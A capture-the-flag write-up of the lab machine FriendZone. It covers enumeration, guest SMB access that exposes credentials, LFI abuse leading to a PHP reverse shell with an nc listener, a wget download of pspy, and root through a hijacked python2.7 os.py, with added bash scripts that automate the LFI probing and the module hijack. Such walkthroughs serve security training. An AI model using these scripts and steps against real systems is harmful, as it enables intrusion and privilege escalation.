HTB Writeup - FriendZone

NoBlameNetwork, July 13, 2019
FriendZone is an "Easy" difficulty Machine on hackthebox.eu


First Step: Nmap Scan of the Machine
nmap -n -v -Pn -p- -A --reason -oN fz.txt 10.10.10.123 


Ubuntu, with a few things worth looking at
Primary areas of opportunity: FTP/21, HTTP/80, SMB/445
Interesting port: TCP/53
21/tcp  open  ftp         syn-ack ttl 63 vsftpd 3.0.3
22/tcp  open  ssh         syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp  open  domain      syn-ack ttl 63
80/tcp  open  http        syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
139/tcp open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    syn-ack ttl 63 Apache httpd 2.4.29
445/tcp open  netbios-ssn syn-ack ttl 63 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)


I added a static entry to my /etc/hosts file

10.10.10.123  friendzone.htb

Checking to see if we can find anything with DNS, since TCP/53 is open, but nslookup against friendzone.htb shows nothing, and a DNS zone transfer for friendzone.htb shows nothing either.

Time to check out something else. Check the web browser first:

Nothing on the page worth mentioning, nothing in the source either.

Time to check HTTPS:

I accept the certificate, but the page doesn't load.

I check the cert and find the CN is set to friendzone.red.

Added a new entry for friendzone.red into /etc/hosts.

nslookup still didn't give me anything useful, but a DNS zone transfer for friendzone.red returned multiple hostnames used by this box.

Added 3 new entries into my /etc/hosts file, giving four in total:
10.10.10.123  administrator1.friendzone.red
10.10.10.123  hr.friendzone.red
10.10.10.123  uploads.friendzone.red
10.10.10.123  friendzone.red
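The zone transfer step above is worth scripting, because every A record that comes back is a candidate virtual host for the same IP. The function below is an added example, not part of the original writeup: it turns dig AXFR output into ready-to-review /etc/hosts lines. On the box the live command would be `dig axfr friendzone.red @10.10.10.123 | axfr_to_hosts 10.10.10.123`; the sample output embedded here is constructed for offline use and its record values (TTLs, SOA, NS) are assumptions, not a capture from the machine.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): convert a DNS zone transfer
# into /etc/hosts entries for a single target IP.

# axfr_to_hosts IP: read dig AXFR output on stdin and print "IP  name" for
# every A record pointing at IP, deduplicated, trailing dot removed.
axfr_to_hosts() {
    local ip="$1"
    awk -v ip="$ip" '
        $0 ~ /^;/ { next }                      # skip dig comment lines
        $4 == "A" && $5 == ip {
            name = $1
            sub(/\.$/, "", name)                # strip the trailing dot
            if (!(name in seen)) { seen[name] = 1; print ip "  " name }
        }' | sort -u
}

# zone_names: just the hostnames from the transfer, handy as a wordlist for
# virtual-host fuzzing or for checking TLS certificate names.
zone_names() {
    awk '$0 !~ /^;/ && $4 == "A" { sub(/\.$/, "", $1); print $1 }' | sort -u
}

# Constructed sample of what dig prints for the transfer; record values are
# assumptions for this example.
SAMPLE_AXFR='; <<>> DiG 9.11.5 <<>> axfr friendzone.red @10.10.10.123
friendzone.red.                604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.                604800 IN NS  localhost.
friendzone.red.                604800 IN A   10.10.10.123
administrator1.friendzone.red. 604800 IN A   10.10.10.123
hr.friendzone.red.             604800 IN A   10.10.10.123
uploads.friendzone.red.        604800 IN A   10.10.10.123
friendzone.red.                604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800'

# Usage: review the output, then append it to /etc/hosts.
printf '%s\n' "$SAMPLE_AXFR" | axfr_to_hosts 10.10.10.123
```

Only A records are turned into host entries; SOA and NS records are skipped, and the output is deduplicated so a zone that lists a name twice does not produce duplicate hosts lines.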


DNS Entry 1) https://friendzone.red was just a gif of a dude trying desperately to escape the friendzone.

Directory busting found /admin, but it was empty. So I think this is a dead end...


DNS Entry 2) https://administrator1.friendzone.red, an admin portal for something. Sweet!

Directory busting found an images folder, but there is no access without logging in first.
We'll revisit https://administrator1.friendzone.red for sure

DNS Entry 3) https://uploads.friendzone.red, an upload page! Here I was thinking LFI for sure.

I uploaded an image to verify what a working upload looks like.

It says successful and returns what looks like an epoch timestamp.

No matter what I tried, I was unable to determine where the uploaded files were ending up. So, perhaps useful, but I'll just keep it in mind for later.

DNS Entry 4) https://hr.friendzone.red does nothing, the definition of a dead end.


Time to see what other information we can find. Let's check SMB/445 (the -N flag asks for a null session instead of prompting for a password):
smbclient -N -L friendzone.htb

# Create a directory for mapping the shares
mkdir ~/sambas
cd ~/sambas
# Create a mount point for each of the 3 shares
mkdir Files general Development

# Attempt to mount all 3 shares with the guest account and an empty password
mount -t cifs //10.10.10.123/Files ~/sambas/Files -o username=guest,password=''
mount -t cifs //10.10.10.123/general ~/sambas/general -o username=guest,password=''
mount -t cifs //10.10.10.123/Development ~/sambas/Development -o username=guest,password=''

I was able to mount 2 of the 3 shares using the guest login!

The two that accepted the connection are Development and general. In general we find a file named 'cred.txt' with some credentials in it.

Another nice thing about mounting the shares this way, for me anyway, is that you can browse them in the GUI and keep notes in an open notepad. Do what you prefer though!

/general folder: cred.txt (GUI and CLI screenshots of the share)

So I think we've discovered some good information here. The Development share already holds files that other people have dropped into it, which tells me there is some kind of LFI at play for sure.

/Development folder (GUI and CLI screenshots of the share)


Let's try our login credentials on the administrator1.friendzone.red portal.

URL:
https://administrator1.friendzone.red

Excellent, we're in, and it's leading us toward a dashboard!

The dashboard even gives instructions on how to use its URL parameters.

https://administrator1.friendzone.red/dashboard.php

So it brings up an image (a.jpg and b.jpg both work) and takes pagename=timestamp.

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp

Of course we have to check whether timestamp is a local PHP file, and that's exactly what it is: pagename names a .php file that dashboard.php includes. So this is where we hunt for the LFI.

https://administrator1.friendzone.red/timestamp.php

Now, this is where I got frustrated trying to figure out which folder to point the include at. Folks were rebooting the box like mad, sticking pagename=dashboard into the URL above (which makes dashboard.php include itself in a loop), which I'm sure was killing the box, and which I'm also guilty of...

So i stepped away and came back after about 2 weeks. 

This helped, as when I was reviewing my screenshots from my first dive in I noticed the smbclient output had a comment labeling the "Files" share as '/etc/Files'.

If you remember, we had no access to this share, so this may be nothing, but I moved forward with the assumption that /etc/general and /etc/Development (maybe /etc/Dev) were the on-disk locations of the other two shares.

I created a simple PHP file with <?php echo 'hello world'; ?> inside to test, named it dbtn.php (the dashboard appends .php itself, so the URL refers to it without the extension) and saved it in the /sambas/Development folder.


URL:

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/dbtn 
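The guess-the-directory step above can be automated: drop a marker file into the writable share, then ask dashboard.php to include it from each candidate path until the marker comes back in the response. The script below is an added example, not part of the original writeup. It assumes the Development share is mounted at ~/sambas/Development, that dashboard.php appends ".php" to pagename (as the timestamp example shows), that the Apache certificate is self-signed (hence curl -k), and that you pass whatever session cookie the portal login set; the candidate directory list and the marker string are made up for the example.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): find which directory the
# dashboard.php "pagename" include reads from, using a marker file written
# through the writable SMB share.

BASE='https://administrator1.friendzone.red/dashboard.php'
MARKER='lfi-probe-7f3a'                     # arbitrary string we will look for
SHARE_MOUNT="$HOME/sambas/Development"      # assumed mount point
CANDIDATES='/etc/Development /etc/Dev /etc/general /srv/Development'  # assumed

# lfi_url PATH: build the dashboard URL that includes PATH.php
lfi_url() {
    printf '%s?image_id=a.jpg&pagename=%s\n' "$BASE" "$1"
}

# has_marker: succeed if stdin contains the marker, i.e. our PHP executed
has_marker() {
    grep -q -- "$MARKER"
}

# write_probe DIR: drop a tiny PHP file into DIR that prints the marker
write_probe() {
    printf '<?php echo "%s"; ?>\n' "$MARKER" > "$1/probe.php"
}

# probe_dirs COOKIE: try each candidate directory against the live target.
# COOKIE is the "name=value" session cookie from the browser after login.
probe_dirs() {
    local cookie="$1" dir
    write_probe "$SHARE_MOUNT"
    for dir in $CANDIDATES; do
        if curl -sk -b "$cookie" "$(lfi_url "$dir/probe")" | has_marker; then
            echo "include works from: $dir"
            return 0
        fi
    done
    echo "no candidate directory included our file" >&2
    return 1
}

# Usage (live target, assumed cookie):  probe_dirs 'session=abc123'
```

Once probe_dirs reports the directory, the reverse shell step is the same call with the shell's file name in place of probe. Keep the marker unique so a cached or unrelated page cannot produce a false positive.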








This script is consistently one of the best for php reverse shells
http://pentestmonkey.net/tools/web-shells/php-reverse-shell 

I updated the IP and port in the reverse shell script, and uploaded it to the /sambas/Development folder as dbtn_shell.php.

Now we set the Kali box to listen on port 9595
nc -v -n -l -p 9595 

We then go back to our browser and kick off the reverse shell:
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/dbtn_shell


We check the user's home folder and find the user flag.

After hunting around for a LONG time I found a database username and password.

Which thankfully also let me in via SSH:


I was grepping "ps aux" to see what I could find for services.
[screenshot: ps aux output]

I realize that because I spotted this I skipped a HUGE part of the process here, but I did work my way back after I got the root flag. That information is at the bottom of this writeup, and was great to learn!

I found multiple os.py files, which is worth noting.


I looked into the os.py file that the other user had been editing and found the following command at the end of the file:

So it seems that he's piggybacking on a python script which is running at a regular interval. Likely a cron, or maybe something triggered through the web interface.

I wasn't sure where the root flag was specifically, so I grabbed 3 locations I thought it might be (knowing full well that Desktop and Root weren't even likely to exist).

About 5 minutes later I checked my /home folder, and the only file with anything in it was moo3.txt, which held the root flag.
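The os.py trick generalises: any module on the module path of an interpreter that root runs on a schedule, and that a low-privilege user can write to, gives the same result. The script below is an added example, not part of the original writeup. It automates the two checks (which .py files are writable, and which interpreter's path they sit on, which is why the python2.7 tree mattered here and the python3 trees did not) and appends a hijack line the way the writeup did by hand. The interpreter names, the cron script path and the payload command are assumptions for illustration.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): locate writable library
# modules on a root-run interpreter's path and plant a command in one.

# writable_py DIR...: every .py file under the given directories that the
# current user can write to. (test -w is used instead of find -writable so
# it also works on minimal find implementations.)
writable_py() {
    find "$@" -type f -name '*.py' -exec test -w {} \; -print 2>/dev/null
}

# library_dirs: the module search path of each python on the box. A cron job
# only imports from the path of the interpreter it runs under, so editing the
# 2.7 tree does nothing for a python3 script and vice versa.
library_dirs() {
    local py
    for py in python python2 python2.7 python3; do
        command -v "$py" >/dev/null 2>&1 || continue
        "$py" -c 'import sys; print("\n".join(p for p in sys.path if p))'
    done | sort -u
}

# hijack_module FILE CMD: append a line so that importing FILE runs CMD.
# __import__("os") keeps this working in any module; inside os.py itself the
# writeup's shorter system("...") form works too. CMD must not contain
# double quotes.
hijack_module() {
    local file="$1" cmd="$2"
    printf '\n__import__("os").system("%s")\n' "$cmd" >> "$file"
}

# Typical use on the box (paths and payload are assumptions):
#   writable_py $(library_dirs)
#   hijack_module /usr/lib/python2.7/os.py 'cp /root/root.txt /home/friend/moo3.txt; chmod 644 /home/friend/moo3.txt'
# then wait for the scheduled reporter.py to import os.
```

The payload is appended rather than inserted so that the module's own definitions still load first; a syntax error anywhere in os.py would break every Python program on the box, including the cron job you are relying on.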




Ok, so back to the piece I skipped... remember I spotted this guy editing the python file directly in the ps aux screenshot above.

To the google! I found an application that lets me see all running processes, even without root. Ironically, you can see in that screenshot that someone was running .pspy, so this is likely the exact same way he figured it out too.

GitHub for the win!

I cloned the repo from github.

Started up my super basic web server on the Kali box:
systemctl start apache2

Copied the pspy64 binary (it is a static Go binary, not a Python script) into my web folder:
cp pspy64 /var/www/html/

Downloaded the binary onto the box into /home/friend/test:
wget http://10.10.x.x/pspy64

Ran into a permission error, because wget does not preserve the execute bit:
./pspy64

Fixed permissions (execute is all it needs; 777 is not required), and it started listing all running processes:
chmod +x pspy64 && ./pspy64




The output screamed for a few seconds before calming down, but within 2-3 minutes I saw the following:

Checked the reporter.py file and found nothing of consequence other than the 'import os' line, which refers back to the os.py file in the python2.7 library folder.

What I can't figure out is how they determined they needed to edit the 2.7 file as opposed to any of the 3 python3 folders...
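When you cannot get a binary onto a box, the same idea pspy uses can be done from the shell by polling /proc, which any user can read. The script below is an added example, not part of the original writeup and not pspy's code: it snapshots the process list and prints every process that appears afterwards with its uid and full command line. pspy prints the command line too, including the interpreter path, which is the clue to which library tree a scheduled script imports from. Because this version polls rather than reacting to filesystem events, a job that finishes between two polls can be missed; the poll interval is an assumption to tune.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): a minimal pspy-style process
# watcher built on /proc, usable without root and without uploading anything.

# snapshot: one line per process, "pid uid command line"
snapshot() {
    local d pid uid cmd
    for d in /proc/[0-9]*; do
        pid=${d#/proc/}
        cmd=$(tr '\0' ' ' < "$d/cmdline" 2>/dev/null) || continue
        [ -n "$cmd" ] || continue                # kernel threads have no cmdline
        uid=$(awk '/^Uid:/ {print $2; exit}' "$d/status" 2>/dev/null)
        printf '%s %s %s\n' "$pid" "${uid:-?}" "$cmd"
    done
}

# pids_of: reduce snapshot output to a sorted pid list, for comm
pids_of() {
    cut -d' ' -f1 | sort
}

# watch_procs [INTERVAL]: print processes that start after this call, with a
# timestamp, uid and full command line. Ctrl-C to stop. Short-lived jobs that
# start and exit between two polls are missed; lower INTERVAL to catch more.
watch_procs() {
    local interval="${1:-0.2}" old new full
    old=$(mktemp); new=$(mktemp); full=$(mktemp)
    trap 'rm -f "$old" "$new" "$full"' EXIT INT
    snapshot | pids_of > "$old"
    while :; do
        sleep "$interval"
        snapshot > "$full"
        pids_of < "$full" > "$new"
        comm -13 "$old" "$new" | while read -r pid; do
            awk -v p="$pid" -v t="$(date +%T)" '$1 == p {
                printf "%s pid=%s uid=%s cmd=", t, $1, $2
                for (i = 3; i <= NF; i++) printf "%s ", $i
                print ""
            }' "$full"
        done
        mv "$new" "$old"
    done
}

# Usage on the box:  watch_procs 0.1
```

Watching for uid=0 entries whose command line names an interpreter and a script (for example a python binary followed by a .py path) is the quickest way to spot a root cron job, and the interpreter in that line tells you which site-packages tree it will import from.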


Dead Ends and Rabbit Holes

  • https://friendzone.red, 
    • was just a gif of a dude trying desperately to escape the friendzone.
    • /admin went nowhere
  • FTP
    • Never got in, and spent a while trying to identify any vulnerabilities to no avail.
  • Wfuzz
    • I love wfuzz... but since this used so much SSL I wasn't able to use it, and blew a lot of time trying to figure out a way to fuzz even if it was HTTPS.
  • https://uploads.friendzone.red
    • I assumed it was a broken script on the front end so I wasted a lot of time trying to fix the input object names. In the end the script on the backend (upload.php) literally doesn't do anything with the file. It just checks if there is one, then tells you it was successful.
  • https://administrator1.friendzone.red/dashboard.php
    • Finding the right folder to abuse the LFI. In the end the answer was simple... and if I had spent time looking for clues it would have been faster.